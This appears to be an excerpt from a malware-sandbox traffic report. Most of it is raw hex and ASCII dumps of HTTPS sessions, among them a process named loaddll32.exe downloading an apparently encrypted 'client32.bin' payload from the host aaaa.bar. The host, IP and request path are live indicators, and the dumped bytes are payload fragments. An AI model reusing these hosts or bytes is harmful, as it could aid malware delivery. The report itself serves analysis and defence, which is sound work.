                                                              2021-10-20 13:12:18 UTC1446INData Raw: 53 62 ae a3 d9 7e 7d c3 98 68 9b fd 89 49 70 57 0e eb 52 29 d6 62 e9 f2 1d 7c d2 46 2f a4 96 33 f6 b6 b3 94 d7 30 63 04 db fb 60 4d 2c 82 18 01 17 89 2f 44 0e 4f 7f 5f b2 79 c7 f3 f9 88 ad 5e 15 d3 3f c9 fd 72 fd 77 87 17 60 75 f8 85 83 6b bc 96 51 7a 33 23 e7 bf aa f3 5c 3e cd f2 10 54 d0 c5 f8 aa 0d c9 05 d8 c3 6c ef 6a 00 de 77 81 77 d9 fa d9 93 71 85 14 dc f0 13 ff 87 f6 7f 1d 3c 3d 29 77 97 16 13 13 fa e5 8b e9 c9 c1 ad 5c 0d a5 b7 be 11 a6 85 a8 5b 1b d8 ae e7 85 ff e8 46 47 ed a1 40 b2 bc 1a 82 fc d0 9c a8 32 b7 dd 06 cf 50 34 72 6b 24 ad d7 ec e0 ac 79 27 1e 9d 26 e2 1e c2 42 2a e8 eb 49 33 b2 8f ad b7 7c 81 79 73 6f f8 af d3 6b 80 7c e1 13 21 f7 60 0b e0 ff 59 a0 f8 81 3e 7f 44 55 87 59 5e 53 c0 3a 96 a9 09 3d 45 f0 e4 5b b7 1d c6 5d 47 01 ed a4
                                                              Data Ascii: Sb~}hIpWR)b|F/30c`M,/DO_y^?rw`ukQz3#\>Tljwwq<=)w\[FG@2P4rk$y'&B*I3|ysok|!`Y>DUY^S:=E[]G
                                                              2021-10-20 13:12:18 UTC1462INData Raw: 5b a1 00 c6 64 27 d0 af 5b e1 4c ed c1 71 6f 5b f5 7b 94 53 8c e5 92 1e b4 2f 7d 8d c5 5a e6 ac 0b 6e f5 0d 40 99 f2 a5 d4 40 d4 71 e9 23 2c 40 bb 6f eb 96 73 0e f9 51 c8 63 9d 33 49 0c 31 7e 88 5c 3e 3c 15 f7 97 48 32 f8 2b e6 fb 88 1a e0 38 e7 13 58 63 9d e7 80 c5 f0 3e ba 91 42 0d 7f cd e9 0d ca e3 e1 81 57 f5 94 7b 71 2f 6d 7c b4 2a f7 6e 85 74 50 94 a5 43 c7 77 00 5e b4 6a c4 a9 37 d4 dc 5f b2 55 b9 d9 f4 e1 81 94 56 02 73 a8 36 b4 9e 4c 53 32 2c 31 20 01 8d c0 58 2a fc df b0 40 cf c3 6e e0 e3 b2 9d 67 10 e6 39 cc 37 2e 73 f7 4d 50 e2 6d 58 bd 3a 55 df 58 64 a3 a7 0b 6a d4 6e a1 4d 01 38 6c 37 62 fe 10 18 92 15 6c d7 7a 2b 46 28 01 c7 58 63 82 80 26 be a3 71 09 9d a3 02 22 2a 19 a5 30 a2 08 40 9a 1c 4f 78 9e 17 cd 38 fe dd 3c 7f 14 42 23 ca 13 19 6e
                                                              Data Ascii: [d'[Lqo[{S/}Zn@@q#,@osQc3I1~\><H2+8Xc>BW{q/m|*ntPCw^j7_UVs6LS2,1 X*@ng97.sMPmX:UXdjnM8l7blz+F(Xc&q"*0@Ox8<B#n
                                                              2021-10-20 13:12:18 UTC1478INData Raw: e2 dd d8 1c c8 ef 82 c0 af 65 b2 ce cf 9b cd 9b 52 a1 f8 80 fe e4 7d a5 36 12 88 cc 61 8a 33 bd 39 e6 58 9f 50 01 1c 4d 01 b4 eb 19 a5 a3 ec 06 45 14 c2 d5 47 4e f9 a8 14 fc a6 64 43 36 fb 29 34 85 de d6 b9 f8 bc 81 aa ee fb 1e e6 d0 7e 0c 8e 4e b9 31 0c 12 af e9 e6 fd 22 d2 c6 50 16 a6 02 1d 7a f6 2b d3 46 07 4f e6 73 ed 53 38 c2 58 45 28 58 3a b1 f6 c3 18 df 96 8a 6f 7e ff 15 c1 12 a6 b6 ac 7f c1 0f ac 94 31 88 b8 1f 5f 74 d9 63 e1 94 11 49 c3 dd 20 d2 c4 78 26 12 f1 60 73 6d 29 bf 09 38 72 79 07 13 3c 13 08 1e 76 10 10 55 a4 fc d1 65 f1 a9 7a 28 bd a7 c6 2e ce 43 31 2e 3d 3b b4 7f b0 2e b5 1b 6c f5 84 98 81 e2 31 55 d2 a7 40 7e 40 c4 a8 e0 2e f9 ef 8c 00 21 f5 26 dd 7c 76 30 ba 5a 76 4f d3 3c 6a e2 da 0f 7c 14 76 42 02 d0 a6 c3 58 3a 01 7c e3 74 fa bc
                                                              Data Ascii: eR}6a39XPMEGNdC6)4~N1"Pz+FOsS8XE(X:o~1_tcI x&`sm)8ry<vUez(.C1.=;.l1U@~@.!&|v0ZvO<j|vBX:|t


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              2192.168.2.549827104.26.3.70443
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:08:50 UTC11OUTGET /px.gif?ch=1&e=0.9973131461099627 HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: ad-delivery.net
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:50 UTC14INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Oct 2021 13:08:50 GMT
                                                              Content-Type: image/gif
                                                              Content-Length: 43
                                                              Connection: close
                                                              X-GUploader-UploadID: ABg5-UzSZ-Kt1WbGdd88HlCnZf7YcJGLu-DR5tPwPS9bXoxAsvJYwt4jGn6LAHoZbG34sctt0vecv7iFCJZExLBCcbRvF7nEjw
                                                              Expires: Wed, 20 Oct 2021 13:50:16 GMT
                                                              Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                              ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                              x-goog-generation: 1620242732037093
                                                              x-goog-metageneration: 5
                                                              x-goog-stored-content-encoding: identity
                                                              x-goog-stored-content-length: 43
                                                              x-goog-hash: crc32c=cpEfJQ==
                                                              x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                              x-goog-storage-class: MULTI_REGIONAL
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                              Age: 132
                                                              Cache-Control: public, max-age=86400
                                                              CF-Cache-Status: HIT
                                                              Accept-Ranges: bytes
                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9UdSBPg7KxPLYXkLYWWw%2FzfU%2Bjl3lm61mPRAcM6vy1WttpD0vU4QqlZueRvpAAlWKkEKeNsWBxbK5rXPslBckXDOVoDPWX1iA5qjHzheJG5ufELPAVqm%2BVl61HEQeb3lSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 6a127a271d351f1d-FRA
                                                              2021-10-20 13:08:50 UTC15INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00
                                                              Data Ascii: GIF89a!
                                                              2021-10-20 13:08:50 UTC15INData Raw: 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                              Data Ascii: ,L;


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              20192.168.2.54997031.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:20 UTC1493OUTGET /jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
                                                              2021-10-20 13:12:21 UTC1493INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:20 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 227913
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:21 UTC1494INData Raw: 7a d8 e7 e8 5a b1 41 33 b2 bc 98 a1 2d 68 13 0f 97 e9 11 38 74 e6 87 20 80 55 24 d2 32 ca b0 b5 fb ef 70 18 d4 d5 42 17 72 8e d5 2f 06 81 8a 8a 11 9a ce 93 c7 7d 46 ec 89 6f b9 08 6e f3 e9 5b bb 4a 79 2d ee 4e f7 bd 61 1f 44 cd 0a f7 36 20 5a 91 04 8e c1 33 8f f7 b1 d2 4e a6 0c 00 cd 68 f5 3a 14 99 e6 2b 34 95 d5 f2 e2 94 d4 0c 25 ae 18 03 78 09 8e f0 c5 6d 1b ab 49 c1 ad 79 81 48 e4 18 22 57 b8 52 0d 2c 28 17 6f a0 8b 55 5f 4b b3 ff 20 9e 5b f8 e2 dd 1a 3f da c4 ce aa 67 12 2e 97 13 2a f0 f8 b1 ff f1 e6 74 f3 a8 1c c9 9e ed 04 cf 21 b7 dc 2c 23 07 33 02 1b f7 d2 cc 06 e3 d7 20 04 e5 45 b7 db 43 76 2e c6 52 d0 4e d3 fe f7 73 59 44 33 b9 94 7e 52 1a 0f 88 95 66 09 0b 79 84 05 4d 1f b8 a4 eb 7b 33 8a 20 c9 4a 1a 36 2a 02 4b 45 ec 8c 07 04 f7 14 d0 74 ce ec
                                                              Data Ascii: zZA3-h8t U$2pBr/}Fon[Jy-NaD6 Z3Nh:+4%xmIyH"WR,(oU_K [?g.*t!,#3 ECv.RNsYD3~RfyM{3 J6*KEt
                                                              2021-10-20 13:12:21 UTC1509INData Raw: 2e 4a 31 ca f3 2b be 89 95 34 73 d7 cb 0c 35 50 c4 f1 24 68 8b 88 fc e3 a7 a4 41 86 f8 78 72 ba 2c 90 c1 e3 b3 fd cc d2 05 5c b3 e9 df 42 3a 66 1d 3d 9c 30 db dc 67 7b ab 0a 63 9e 99 3a e3 34 02 9b e3 c3 2a 8e 7b 0a 0e d6 b3 13 54 08 d7 62 5c c8 8a f5 3f 45 1a 48 f9 ef 9c 14 54 a6 b4 3d 2e 56 59 e6 16 5b 29 3c 7b 64 d9 3f 07 fa 80 0a 6a b7 ba 82 65 f6 e2 03 5c 3f 54 5c a2 73 0f 30 1a 81 cf 8b e6 ab e2 01 73 0f 1e 18 75 ad 97 26 cb 15 de 15 d6 48 cb 51 79 8f 3f 63 7b 8f f1 92 43 f0 4f 57 de 6c 4e ad b8 1f f6 47 b9 a2 d8 bc 92 4a 95 19 03 62 3c 8d 67 62 d1 80 db d2 f7 06 37 5c 0f 39 52 04 32 b5 99 20 0e ee 13 87 8f c5 e1 15 23 87 6f d4 a4 3f ae fc ef 14 81 fd fb 27 56 6a a0 df 16 76 77 a2 ca c9 af bc ab 64 2a 89 5d 62 98 bf bb 00 02 3f e2 68 b0 35 6a ef 7e
                                                              Data Ascii: .J1+4s5P$hAxr,\B:f=0g{c:4*{Tb\?EHT=.VY[)<{d?je\?T\s0su&HQy?c{COWlNGJb<gb7\9R2 #o?'Vjvwd*]b?h5j~
                                                              2021-10-20 13:12:21 UTC1525INData Raw: 1b c5 c1 52 5d e8 1b 9f 71 ab 0e 0b 8a 06 41 d0 4e b2 cb 38 c5 78 ca 47 e5 5b 37 6b 00 6a a2 3b 43 82 0b 40 3b 9b d6 a7 5c ba 97 be 1f e7 ee af 71 bb 24 48 79 84 77 57 bc ab 4e bb f7 97 e6 e1 0d 53 9e f0 14 bf 31 5d 58 05 68 f2 a0 17 71 1c ad 45 3f ae c8 bc a5 aa 93 eb ba c8 a7 67 ac 5c eb d9 b1 07 eb 5f 17 c0 18 44 0c f2 3d e5 81 b3 8a 93 07 8c a4 fa 37 bc 6f 4c a1 a0 6e 28 50 74 08 0f 4a 51 66 bb b7 f9 2f 6e 3c 71 74 ff d7 8c 9e b5 56 56 9c a7 22 d5 d7 29 76 b5 2e e9 c9 bb bc 74 89 5e 8b 63 a9 b2 5f 63 13 02 9c 34 83 60 13 85 42 2e a4 07 d3 64 e0 bf ec b0 74 b5 5d 30 8f 37 aa b8 eb b6 97 ef d8 c1 41 32 84 02 bf c5 59 16 51 c4 c9 d5 e2 66 32 ef 4b ab 59 9e 90 a0 d8 db c6 fb 78 77 d3 df b2 65 22 a3 66 bb 19 18 43 48 26 2f b4 dc 7b 68 0d 6e 34 d8 2b d0 43
                                                              Data Ascii: R]qAN8xG[7kj;C@;\q$HywWNS1]XhqE?g\_D=7oLn(PtJQf/n<qtVV")v.t^c_c4`B.dt]07A2YQf2KYxwe"fCH&/{hn4+C
                                                              2021-10-20 13:12:21 UTC1541INData Raw: 5f 7a 9f 35 09 63 55 53 bb 4b 41 13 f0 91 f8 0a 07 60 7b f7 55 83 b4 a5 17 86 71 27 6b 8d 18 72 f9 43 15 c2 61 8b 60 90 27 e9 c9 13 a2 a0 63 2f 4d 2a 03 5a 41 7f 9f ab 65 f3 69 ce 1b 35 41 db 34 ea eb d6 9d 9f 13 e8 da 77 03 6a d8 e8 da 4f 0b 2b 13 51 a4 96 a7 47 32 59 77 45 0e b9 1f 3f 73 be 78 a0 8b a6 2d 08 2a 52 36 5b 9d ee c1 d3 49 99 23 d5 5b a7 75 83 e2 18 23 e6 f1 ea 0d 54 aa 2d c6 ee 57 34 e5 fb 67 f2 4b 03 93 72 06 90 b3 b6 3e 4b 0d a4 7f 44 69 e4 dc 3f 91 e0 72 6e 51 e4 59 b9 2d 88 6f 71 75 62 c4 aa f8 c6 f9 3f f1 7f cc f0 29 ea 89 7c 41 40 97 26 1c d1 5a 80 46 a4 7e fd 7b 04 0b 75 65 21 25 9a 05 08 e6 80 cc 1a 48 15 cc c7 14 c2 d7 ab bb 00 83 16 00 d3 4e 21 b2 50 29 94 10 54 24 aa c8 23 81 b3 16 c0 fd de fd 17 01 de 7a 04 d1 0f d1 52 69 97 78
                                                              Data Ascii: _z5cUSKA`{Uq'krCa`'c/M*ZAei5A4wjO+QG2YwE?sx-*R6[I#[u#T-W4gKr>KDi?rnQY-oqub?)|A@&ZF~{ue!%HN!P)T$#zRix
                                                              2021-10-20 13:12:21 UTC1557INData Raw: f6 dc b3 15 4c d1 14 b8 eb 59 b9 e1 37 08 b7 e2 48 73 d3 5f 58 44 83 57 60 8a b5 ba 46 dd e5 13 b4 4b 9f fa b9 3b 16 57 c6 74 ba b7 ca ae da 55 18 25 a9 61 16 1d 54 de c6 0e 93 ad 72 af 8f 01 7f 9e e5 c2 30 ce 18 65 e9 8d 33 23 21 dd 90 99 be 5a 86 38 60 0a 64 5e c0 3c 9b 98 4a c1 8a ae e6 0b 47 ee 0b ba db c2 e3 cc 1e f2 82 cf 91 7a 59 09 fb 82 ef d3 2c 94 20 0d b3 b6 8e fe fd 12 23 d6 25 d3 1e 4c 5e f8 72 51 3b 5a 5c 95 64 a0 88 22 56 ba 5f d3 14 e8 00 66 ea fb 4f 45 b5 4e 9b 57 cf 89 c4 4e a6 c4 0f dd 04 48 55 f2 4d 05 24 24 c3 51 8a b9 48 c7 c6 d8 f6 c9 af f1 de eb 65 ff 4b 63 c3 ea a4 5d 7b 34 40 46 9d 9a 1f be f2 e5 78 ae 49 25 7f 4a 1c 95 15 02 ba 5f ad 1f 2e 56 d5 e7 19 6f de 86 4e d2 7b 7a de 6d f8 e7 dc 57 f5 23 81 91 3e ab 9d df bf 74 84 26 4b
                                                              Data Ascii: LY7Hs_XDW`FK;WtU%aTr0e3#!Z8`d^<JGzY, #%L^rQ;Z\d"V_fOENWNHUM$$QHeKc]{4@FxI%J_.VoN{zmW#>t&K
                                                              2021-10-20 13:12:21 UTC1573INData Raw: 20 bc 07 a2 70 0c ba 65 28 80 61 ab 01 b1 81 37 31 09 a2 a1 66 5c 85 4e 97 ed 5b 95 a8 9f 75 75 3d 68 61 73 f3 9a 62 84 80 1b 83 41 4d a0 6a 3c 97 8b d3 01 45 8e 7d cf 25 76 f8 60 d6 85 04 29 da f2 2a 6a f3 5c 61 19 53 6a e0 54 b4 c8 d0 3d ec b1 f6 a8 41 70 ee a4 81 45 ae cb e4 f8 8e 6b 38 06 eb 05 dd ba 7a af f5 35 93 6b 7d c7 2c 71 20 21 07 81 ac 0b 8d 58 e3 6b 10 c6 50 0f 13 ad a6 a1 48 72 94 7d dd ce 69 16 50 6f 88 bb 55 6f 6c 31 8b ed e7 4b ea a0 cf 38 71 e4 0c f9 89 79 21 01 d8 34 b9 1e 5e 00 38 24 6b ea be e2 59 48 44 b1 52 cd b1 4b f0 70 a9 f8 5e 59 be b8 eb c3 7f 82 9c 9a ff 12 47 93 09 c4 42 ba 07 90 86 13 79 cd e1 4f f3 2c cf e3 13 d4 63 f4 a7 c6 57 a3 a5 9b 80 40 43 ce 8d 9b eb 6e bd f6 db 92 35 b5 45 df 08 5a f2 df 84 f0 c2 9c 93 80 35 01 c8
                                                              Data Ascii: pe(a71f\N[uu=hasbAMj<E}%v`)*j\aSjT=ApEk8z5k},q !XkPHr}iPoUol1K8qy!4^8$kYHDRKp^YGByO,cW@Cn5EZ5
                                                              2021-10-20 13:12:22 UTC1589INData Raw: 3b 57 ae 94 64 e1 a2 2f 21 c8 68 fe 83 e9 c0 cc a5 b4 7d ed a7 76 49 ee 30 ac 0d 6b 83 8d 7e 8c ee f8 05 a7 b8 0d 28 e8 9f 3a fb 0b 38 bd fc e6 f8 a1 f9 86 52 ed 92 14 e5 a5 bb 73 24 43 0c 32 6b e9 a3 3e 89 f9 40 7e 69 90 4b b7 6a bf 9b fa 8c e4 ad 3a 20 45 36 5a 03 e0 ff 57 aa de 5d 27 4d 6d f8 a4 95 ae 49 02 c3 28 03 59 cd e3 fc e9 10 ac 2e 39 9c 64 22 3e 5a c2 81 57 11 29 68 0c 61 51 2f dd c5 b5 77 8f 31 ac 3c 48 aa 79 78 74 63 5c da a6 49 bc d2 39 01 f1 0f bb c2 f6 2a 5f 28 b1 0d 45 ca e9 dd 2c 23 c9 61 c2 45 e8 64 1d 29 cb b1 f7 70 c4 6d 0b 74 3d 1a 6f 20 e9 67 f2 6c 6a 67 15 27 d6 86 19 bf d1 31 31 15 ca c2 e1 0d 22 f6 cd 34 a4 87 47 81 23 7c 06 aa db 60 22 7b 5d 59 df 70 e6 8f 80 70 c9 d4 2e 2f 22 98 bb ad 88 cb b3 3b b0 11 09 ab 1a f3 75 16 9d 3b
                                                              Data Ascii: ;Wd/!h}vI0k~(:8Rs$C2k>@~iKj: E6ZW]'MmI(Y.9d">ZW)haQ/w1<Hyxtc\I9*_(E,#aEd)pmt=o gljg'11"4G#|`"{]Ypp./";u;
                                                              2021-10-20 13:12:22 UTC1605INData Raw: f4 45 5b 10 5c 2d 4f 1a 90 46 e3 a0 a3 5d 2e e4 27 e6 81 b2 37 f3 fe f5 c0 cb e2 5a 0c 85 c8 56 8d 72 ef 1d 40 1f bd 5e 9f e2 2c 58 0d ce 81 8d 68 22 f1 3e be b1 ce 56 8e 96 ed 7f cb 93 2f c6 da 16 3f 14 29 1e 69 9f ec 31 e0 23 9a 44 94 ef 4b d8 d0 c1 08 99 69 29 c8 2a 18 90 5d 29 c6 d0 cf 66 66 b7 01 05 60 0b 83 1a 6d f9 a0 1d a2 2d 4d a8 5e fc 38 c5 9e 05 82 09 de 00 4f b7 73 ea fb 72 8c cf 67 11 83 58 16 68 e5 c9 91 0f c6 ab 3c ca b1 6f a4 bf 65 e6 a9 54 f6 5c e5 52 58 a3 47 c0 29 a5 02 3c 26 7e 71 87 43 db e8 e3 12 c2 56 f4 e8 c1 a2 78 c5 10 65 40 9f cb f9 f8 c9 72 03 b4 6e 95 83 be c1 6e 77 9d 2a 24 bb 73 49 27 db 0a 07 10 9c 66 19 ba ea 00 22 f3 19 53 e4 a1 e4 9f 83 db a8 a6 ea 07 ec 20 6f 87 4f c8 0a 75 cc cc e6 2d fd 2d de 8a 1a 29 f7 1e 23 9e 84
                                                              Data Ascii: E[\-OF].'7ZVr@^,Xh">V/?)i1#DKi)*])ff`m-M^8OsrgXh<oeT\RXG)<&~qCVxe@rnnw*$sI'f"S oOu--)#
                                                              2021-10-20 13:12:22 UTC1621INData Raw: b0 34 69 ae f2 ed 91 62 cf 4c f2 04 e4 81 46 be 40 88 33 ea 12 7f 56 54 38 6e db 40 6d 51 a2 77 ae 02 c6 38 fe 95 2b 17 d7 46 6d 99 c8 3d a7 24 23 10 19 04 2e 3f b8 3d 3c 61 b3 75 82 a1 db 73 32 a3 ba 8c 74 19 28 b4 61 32 ce 18 c2 a7 b8 29 64 f0 59 ea 32 6e 80 1c e4 08 95 08 11 60 54 47 4f 6e a4 5c 7e 63 6d 92 07 c8 8d 02 05 b3 5f 8e 4d dd 31 80 60 af 08 f7 83 2a 1c 25 60 d0 f5 0d dc 79 5d 9d f6 32 fa 40 07 f0 0d a6 f3 a4 7c 6e 95 c0 37 0f b2 f6 fd 4c a0 42 ea 19 f4 58 ae dd 23 9b f7 bb d5 6f 0c 63 d1 92 98 60 b3 c4 66 10 04 d9 51 49 7c 5e 2a 52 89 d4 a2 1a ee db f4 56 d6 53 c7 b3 05 c1 44 71 f4 45 8a b0 67 98 7d 76 d2 c0 e9 48 78 c3 e4 75 71 8b 47 b9 c0 41 8a 1c 15 d7 33 95 c1 46 41 8d 8f bd b8 6b 7c 5d 0b 00 3c fb f4 92 c9 be 97 92 fc 29 98 dc 54 40 51
                                                              Data Ascii: 4ibLF@3VT8n@mQw8+Fm=$#.?=<aus2t(a2)dY2n`TGOn\~cm_M1`*%`y]2@|n7LBX#oc`fQI|^*RVSDqEg}vHxuqGA3FAk|]<)T@Q
                                                              2021-10-20 13:12:22 UTC1637INData Raw: a6 7e c3 d7 27 38 80 6d 49 5d ad 80 7b 43 c3 fc 9a 87 9f 53 3a b7 14 15 97 8a 69 87 72 bc 3c a7 88 1e 34 ff 0e d6 ba 8e 0f 5d 42 b0 9a d6 48 bf 3d 19 e5 d6 3e 7b 3b 5f 5e b8 5d 9f a4 ac b0 8e a3 bb e9 89 1e 98 f2 24 ce 4f d6 42 b4 09 c7 14 65 d4 28 df 25 8d fd 27 a5 fc 9a 08 3c 41 73 ca 7e 2c b9 b3 10 20 d0 50 ad 19 1f 23 a0 13 9c 55 b8 30 b4 ed e3 06 18 78 7c 56 12 8e 4d dd 81 ab 9f 21 dc b1 8a 1e aa 8d 1b d5 4b e4 66 9c c8 fc 23 e2 16 65 0f 60 75 d1 21 8f 15 4e 4c 9f ef 63 22 84 4b 27 19 d0 65 1c ff c0 40 8f 76 82 c9 84 e6 0c 61 f7 d3 32 8a 48 e6 f8 d6 8c 63 4a 68 b4 7b 5e bd f8 69 f6 a9 61 13 bf 1a 14 4d 37 04 c2 f8 f3 78 71 1f 87 78 1c ed ae 8f 85 45 7e a4 e4 9f 1d be 25 ea 73 b0 1c 81 9b ee 91 31 b2 97 03 2f 7c b8 3e 09 86 68 f0 fe 0c 26 42 85 4a 1a
                                                              Data Ascii: ~'8mI]{CS:ir<4]BH=>{;_^]$OBe(%'<As~, P#U0x|VM!Kf#e`u!NLc"K'e@va2HcJh{^iaM7xqxE~%s1/|>h&BJ
                                                              2021-10-20 13:12:22 UTC1653INData Raw: ad e0 d1 12 29 22 49 f9 a7 34 97 6f 16 37 a2 81 a9 13 85 99 88 2d b8 18 ed ea 94 02 b8 22 70 88 0c 4e 0e 1b 00 37 07 5d 64 37 f1 6a 4c 38 7a f2 3a 1b 46 ef 40 57 8c e1 17 93 3c a3 4b 92 85 6a 10 e7 3f 00 44 98 2b c3 fa ee 7f 6b 37 fb da 91 35 cf 6a 80 66 60 87 9f 24 9d 96 42 04 c0 b3 9a 33 cc 61 ca 16 f3 ed e7 ea a7 3a 20 0f e8 34 ed 80 fe f9 c1 74 5d e2 f9 4a 63 04 d3 49 a0 05 0a f8 4a d1 0a 90 61 6a 78 cd d8 d0 bd e8 5d 41 37 ce 31 6a 1a 93 62 b6 40 78 c3 39 a0 e3 b5 1d 16 c7 a4 52 64 c1 a1 86 59 17 c6 04 73 90 dc 81 c5 b8 85 f8 c8 87 c0 a5 92 a0 ed 29 c2 60 be 4c e0 e9 2e 7b 3f fd 5b 0f a7 d8 d8 2b 82 e3 60 b6 29 35 2b 35 eb de 6d d5 5b 09 af 1e 19 62 3c c6 34 06 bb 37 e1 4c c6 d5 6a 0c e7 7e d4 bc 17 02 40 74 1f 2d 3c fc d2 07 5e 59 fc 92 9e d4 c9 59
                                                              Data Ascii: )"I4o7-"pN7]d7jL8z:F@W<Kj?D+k75jf`$B3a: 4t]JcIJajx]A71jb@x9RdYs)`L.{?[+`)5+5m[b<47Lj~@t-<^YY
                                                              2021-10-20 13:12:22 UTC1669INData Raw: 1d 15 22 2b 66 85 73 55 9e f6 5d a8 ee ce a7 ad e3 06 87 85 cc aa 6b f2 42 fd 2e 71 66 12 47 8e 4f 20 98 f2 f2 2f c8 e4 86 04 6d 89 5a 47 41 b4 c5 b3 2c b5 72 11 ed ba 4a 11 d8 c5 78 7a 07 5e 3a 35 5b 79 1b ea f0 cd 1c 51 ca d6 3f 7c 2a 83 33 78 ea f8 a1 d2 53 56 01 d8 bc f0 70 e3 c7 56 d1 49 7c 69 88 45 fd 9e f8 75 51 b3 6b 86 60 ec 24 61 d5 01 53 f6 dd 5f d0 fc 4a c2 a4 a7 9a e1 19 6e 91 30 ef 70 fc 6b 93 3c 90 c8 f6 19 fc a6 ce fc 4e 06 d6 48 8f d3 2d 9d 12 97 9d 2e cb d0 0f ee c6 9c 88 05 10 81 d9 1b 82 d6 24 26 e5 f9 81 16 d7 c4 21 f4 8d 80 59 6e 21 72 a1 30 24 dc 56 eb 1e c2 33 72 fe 43 94 d6 f7 89 b8 f9 c0 bd e3 2a fb 80 da 0f a1 ff 1d 43 89 84 1a b5 ef f5 db bc e9 79 91 d6 80 6d 40 24 9f 96 b2 01 78 4a 45 bf 58 84 4b 5e 45 41 b6 5b 47 0d e4 3b e4
                                                              Data Ascii: "+fsU]kB.qfGO /mZGA,rJxz^:5[yQ?|*3xSVpVI|iEuQk`$aS_Jn0pk<NH-.$&!Yn!r0$V3rC*Cym@$xJEXK^EA[G;
                                                              2021-10-20 13:12:22 UTC1685INData Raw: 2e fb d7 0d cb 00 dd e6 64 4f 12 08 ca b5 65 15 ea dd 61 cf 59 a0 04 52 6d 3a 86 4a 5c 6f 3c 6c 28 15 af b6 d0 89 01 51 da 89 16 c7 3c 79 9b 77 68 ca cd 8c 91 5e f7 6f 51 58 f6 11 eb 66 c3 96 07 b5 3c 1f 26 a5 27 0a 26 66 13 20 26 1e ed 1f 1e 48 82 7f 31 c3 3e 11 2e 36 52 61 d9 12 a3 8a 5b d8 ad 2e eb c4 f5 02 a5 f3 57 48 23 3e e2 49 bc 1c 72 e8 1d 42 34 84 0c e4 4b 29 19 0d 98 88 d1 f8 85 30 f5 bc 13 32 3e d8 76 cb 37 60 de ac 31 9d bc c1 16 d8 ea 49 2d d5 70 d8 18 86 1a c3 e6 5c b3 d0 15 54 d4 a9 76 e7 43 90 50 a7 09 85 d6 8b 54 00 3d d6 c1 cd 33 e9 99 9b 62 8d 0b 61 48 63 fd 51 68 59 24 9e e2 b2 37 dd ce 4a 4e ba 5e 02 84 db 7f 49 bd a1 c0 de 66 e3 69 a4 1f 2a 0c 67 99 85 fb 24 98 b2 ab 69 af 8e 8c 62 79 8c 0c 4b d4 5d 7a 2f 03 f4 f8 ac 01 36 31 ab 4a
                                                              Data Ascii: .dOeaYRm:J\o<l(Q<ywh^oQXf<&'&f &H1>.6Ra[.WH#>IrB4K)02>v7`1I-p\TvCPT=3baHcQhY$7JN^Ifi*g$ibyK]z/61J
                                                              2021-10-20 13:12:22 UTC1701INData Raw: 9a fa 62 32 5e b9 ab 85 b9 ab 50 c2 4a 8f c4 09 06 ae d5 bc 3a f3 8f f0 af d1 30 0b 9a cf 47 a5 60 5a 9d a6 b3 f3 db df 96 f0 20 0d a5 af d2 f4 64 bd 31 f5 be 5d f3 c5 fa 96 bb b3 a5 6d de cc 0b f5 bf 50 97 43 de 4f 1a 6d 46 32 20 ed 70 40 f0 8e 52 f1 9b a7 17 20 51 75 c9 52 f0 df 6f 73 c6 07 1d 2a 25 36 cb 2a 6f 45 b8 56 ed 01 4a f2 36 7a e4 02 b6 48 2f 27 9c 06 4a 19 1f 1d 07 33 7c 4d d9 28 2c 7d 74 84 5c 11 7c 58 97 9d 6a ab dd eb d2 6c d9 06 63 cc 3e 4a da c1 53 67 47 fc ef 52 94 5a 60 47 3b a9 3c 3b 31 a2 8e 39 86 a6 02 7d 89 e6 27 f4 64 49 f4 28 0e 30 dc 0c 71 0c 45 b0 da 9e ea 87 8e 11 ac 2c 22 ca 4e 8d 3f ae 3f 71 19 52 29 a0 82 9e 3b eb db c6 1e bf e9 4e b1 8b 87 d5 1f 14 a3 8a 84 